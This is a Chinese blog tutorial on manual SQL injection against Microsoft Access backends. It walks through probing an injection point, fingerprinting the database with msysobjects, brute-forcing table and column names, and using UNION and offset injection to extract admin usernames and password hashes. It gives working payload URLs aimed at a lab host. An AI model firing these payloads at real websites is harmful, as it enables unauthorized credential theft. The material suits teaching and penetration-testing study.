WEB攻防-通用漏洞-SQL注入-ACCESS一般注入与偏移注入

已于 2024-07-22 08:24:57 修改
阅读量881 收藏 16
点赞数 10
分类专栏: SQL注入 网络安全 文章标签: sql 数据库 sql注入
于 2024-07-11 14:56:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45534587/article/details/140345031
版权

ACCESS数据库

Access数据库是Microsoft Office套件中一款小型关系型数据库管理系统

  1. 单个数据库文件:Access数据库通常以一个单独的文件形式存在(如.accdb或旧版本的.mdb文件),这个文件包含了数据库的所有对象,如表、字段等。每个Access数据库文件都是独立的,互不影响。
  2. 独立运行:当打开Access数据库时,实际上是在打开一个独立的数据库环境,该环境仅包含当前数据库文件中的数据和对象。

一般注入流程

案例:

1、判断注入点

符号报错:因为引号,括号是成对出现的,如果少了或者多了都会报错,或者类型错误报错

逻辑型:比如在原sql语句拼接判断语句 and 1=1,因为为true正常返回, and 1=2为false返回错误

变量运算:如id=1513,传入id=1514-1也能正常访问原页面

2、判断数据库类型

msysobjects是access的默认数据表
sysobjects是sqlserver的默认数据表

 通过判断是否存在以上数据库确定是access还是sqlserver

and exsits (select * from msysobjects)>0 -- access
and exsits (select * from sysobjects)>0 -- sqlserver

返回没有读取权限则代表该表存在

返回名称是否正确则代表该表不存在

从上可以看出该数据库为Access

3、爆破表名

返回正常则代表存在表

 and  exists (select * from admin)

4、 判断当前查询到几列

使用order by n,能够返回正常页面的最大值n则为n个字段,如oeder by22正常,order by23错误,则该查询有22个字段

5、查询回显位

使用union select 1,2,3...n from 表名,n为上面order by查询到的字段数

如:http://192.168.10.133:88/Production/PRODUCT_DETAIL.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin

 6、在对应的回显位猜字段名

同样的存在则返回正常,使用字典爆破

and exists (select admin from admin)      
and exists (select password from admin)

 7、回显数据

把爆破到的字段替换到回显位,就可以获得一条数据,如该案例的3和15

http://192.168.10.133:88/Production/PRODUCT_DETAIL.asp?id=1513 union select 1,2,admin,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 from admin

偏移注入

应用在知道表名,不知道列名的情况

同样的使用union select来做,不同的是不需要知道列名,而是通过偏移爆出数据,但前提是查询的表必须比当前查询到的列数小,如该案例在上文中查询到22列,则如果要查询admin表的列数必须比当前查询的22列的列数少,因为要把查询到表塞进当前查询到列中,不理解往下看例子

 假设当前查询列位12(即order by获取到的列数),需要查询的表admin有4列
http://192.168.10.133:88/Production/PRODUCT_DETAIL.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12 from admin

 假设admin长度不知道,需要一个一个往前推,admin.*代表到是admin表所有字段,当admin.*替代几个回显位就代表admin有几个字段

union select 1,2,3,4,5,6,7,8,9,10,11,admin.* from admin  --回显错误

union select 1,2,3,4,5,6,7,8,9,10,admin.* from admin --回显错误

union select 1,2,3,4,5,6,7,8,9,admin.* from admin --回显错误

union select 1,2,3,4,5,6,7,8,admin.* from admin  --回显正常

 假设7为回显位,需要在这爆出信息,就需要把admin.*向前位移,并向后往前补位

union select 1,2,3,4,5,6,admin.*,11,12 from admin

 从图可以看出1会替换7回显

如果想得到第二位来替换回显位7,则继续admin.*向前位移,并向后往前补位

union select 1,2,3,4,5,admin.*,10,11,12 from admin

回到案例

http://192.168.10.133:88/Production/PRODUCT_DETAIL.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,admin.* from admin

在偏移6位之后回显正常,则知道admin有6列 ,而3和15是回显位,这里选择使用15回显

http://192.168.10.133:88/Production/PRODUCT_DETAIL.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,admin.*,21,22 from admin

得到的应该是id字段数据39

继续向前偏移

http://192.168.10.133:88/Production/PRODUCT_DETAIL.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,admin.*,20,21,22 from admin

得到的应该是用户名admin

继续偏移

http://192.168.10.133:88/Production/PRODUCT_DETAIL.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,admin.*,19,20,21,22 from admin

得到的应该是加密的密码

癞皮狗不赖皮
关注
  • 10
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Access注入
zhuangsle的博客
08-25 690
Access数据库注入 一、注入原理 (一)判断数据库类型 1、前提条件 SQL server中存在内置的变量/系统表(数据库服务器基本上都会有); IIS错误提示没有屏蔽掉,并且SQL server可以返回错误提示; 浏览器能够显示相关的错误提示,一般低版本的ie浏览器可以显示相关的错误信息。 2、通过内置变量判断数据库类型 概述 Access数据中存在一些内置变量,例如User,并且其数据类型被规定为nvarchar,我们可以通过构造SQL语句,提交查询让user与整型数据进行比较,不同数据类型
Access数据库手工注入
IerkeU的博客
11-28 1738
ACCESS数据库手工注入 access数据库 是一种非常简单但是功能完整的数据库,很适合小型网站创建,可以很轻松管理表和列,有很多管理工具。 access数据库结构? access数据库是这么个结构: 表名---->列名---->内容数据 他不像其他的数据库一样、里面创建多个数据库然后才是表再是内容、而access的话只有一个库若干张表。 access注入基本流程? 判断有没有注入点 猜解表名 猜解字段 猜解管理员ID值 猜解用户名和密码长度 猜解用户名和密码 ASP的
Access数据库注入
Birdman-one的博客
12-26 330
---------------------------------------------------------------------------------------------                 SQLMAP渗透笔记之Access数据库注入 -----------------------------------------------------
【hack靶场学习】——access数据库注入
最新发布
weixin_42090431的博客
05-17 493
那么在实际场景中,只需要先找到注入点,通过order by进行字段判断,再使用可控输入对目标数据库进行联合注入即可,本质上和MySQL的联合注入差不多,不过它没有information_schema库,需要猜解它的表名和列名,如果猜对了就会在网页上回显账号密码。SQL注入是非常常见的一个漏洞,如果程序员在编写网站源码时未对SQL执行语句作防护措施,那么用户输入就可以执行SQL语句,导致用户数据被删改、拖库、挂马等。1、判断注入点,一般来说单引号、减号、and等就可以判断是否存在注入
accesss数据库 注入
安全界的彭于晏的博客
06-27 93
Access数据库注入方法 Access数据库的函数 select len("string") 查询给定字符串的长度 select asc("a") 查询给定字符串的ascii值 top n 查询前n条记录 select mid("string",2,1) 查询给定字符串从指定索引开始的长度 盲注Access数据库 Access没有数据库的概念,所有的表都是在同一个数据库下。所以,我们不用去判断当前的数据库
ACCESS注入
qq_57307348的博客
02-13 2369
目录 access数据库结构 access数据库类型判断 access数据库需要掌握的几个函数 access注入基本流程 access查询方法 联合查询 布尔型盲注 access数据库结构 表名---->列名---->内容数据 不像其他的数据库一样、里面创建多个数据库然后才是表再是内容、而access的话只有若干张表。 access数据库类型判断 根据url文件后缀初步判断,一般asp和access数据库连用,通过and (select count(*) from msys
T-SQL篇如何防止SQL注入的解决方法
01-19
1.什么是SQL注入 所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。在某些表单中,用户输入的内容直接用来构造(或者影响)动态SQL命令,或作为...
SXU-网络攻防第六次作业-sql注入进阶
12-27
SQL注入是一种常见的网络安全漏洞,它允许攻击者通过构造恶意的SQL语句来操纵数据库,获取敏感信息或控制数据库系统。本篇将详细讲解在“SXU-网络攻防第六次作业”中涉及的四种SQL注入类型:报错注入、时间注入、堆...
SXU-网络攻防作业五-boolean注入
12-27
首先,我们从【标题】和【描述】中了解到这是一项关于网络攻防的作业,其目标是实践并理解布尔型注入,通过一系列的输入测试,以确定是否存在注入漏洞,并尝试获取数据库中的信息,而不直接打开S&L(可能指的是SQL的...
SQL注入攻击-网络安全攻防新焦点
11-13
5. **定期审计**:定期进行代码审计和安全测试,及时发现并修复潜在的SQL注入漏洞。 6. **安全培训**:对开发人员进行安全培训,提高他们对安全编程实践的认识。 #### 四、结论 随着网络安全环境的日益复杂,SQL...
WEB安全之XXE实体注入漏洞.pdf
12-12
然而,XML的这种灵活性也引入了安全风险,如XXE(XML External Entity Injection,XML外部实体注入漏洞)。 **0x01 XML基础知识** XML文档由XML声明、DTD(Document Type Definition)文档类型定义(可选)和文档...
SQL注入Access注入 (手工)
12-14
什么是SQL注入SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息 —-百度百科 寻找注入点 首先呢,在网站中寻找传递参数的页面,也就是寻找注入点。 判断注入 找到页面(注入点)之后呢,我们需要判断当前页面是否存在注入 传统的方法是: 语句 状态 链接后面加 ’ 报错 and 1=1 正常 and 1=2 报错 or 1=2 正常 or 1=1
Access数据库手工注入全攻略——小白必看
07-18
通过网上资料加大神指导,写出来的关与asp手工注入的攻略。
ACCESS数据库注入详解
qq_45249394的博客
12-17 383
asp链接access数据库代码 “Driver={microssoft access driver(.mdb)};dbq=.mdb;uid=admin;pwd=pass” dim conn set conn = server.createobject(“adodb.connection”) conn.open"provider=Microsoft.ACE.OLEDB.12.0;"&“da...
access注入
D1stiny的博客
04-03 638
新手最先接触的就是手工注入,度过新手期后就会开始使用工具,等到达大神级别后会发现很多东西工具做不了,这个过程被称作返璞归真。 一.access数据库介绍 Microsoft Office Access是由微软发布的关系数据库管理系统。它结合了 Microsoft Jet Database Engine 和 图形用户界面两项特点,是 Microsoft Office 的系统程序之一。至于别的什么乱七...
Access数据库注入详解
qq_44735563的博客
05-22 475
Access数据库注入详解 一:判断数据库:1.access:and exists (select * from msysobjects)>0 2.Sqlserver:and exists (select * from sysobjects)>0 二:判断数据库中的表:and exsits (select * from admin_user) //最后的admin_user是表名 常见...
access数据库的简单手工注入
qq_42042353的博客
09-29 1042
首先利用and 1=1 and 1=2 判断此页面是否用注入点(当然这里是整数型的判断(c_id=266)),如果是字符串型的,则可以用 'and ‘1’='1 'and ‘1’='2 进行判断 利用and exists (select * from admin) 判断数据库中admin表是否存在,判断的话需要爆破,爆破的话意味着成功率不高 利用and exists (select user...
Access数据库注入攻击
奕家
06-25 252
1.通过报错方式确定是什么数据库 通过'和"and 1=1"和"and 1=2"找注入点; 通过返回的报错方式来判断是什么数据库 2.猜解数据库表名和字段 #注:(要在注入点猜) 1)首先来猜解数据库表名 and exists(select * from users) ##返回结果没用报错的话说明有users这个表名 ''' EXISTS表示存在量词:带有EXISTS的子查询不返回任何记录的数据,只返回逻辑值“True”或...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

癞皮狗不赖皮

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值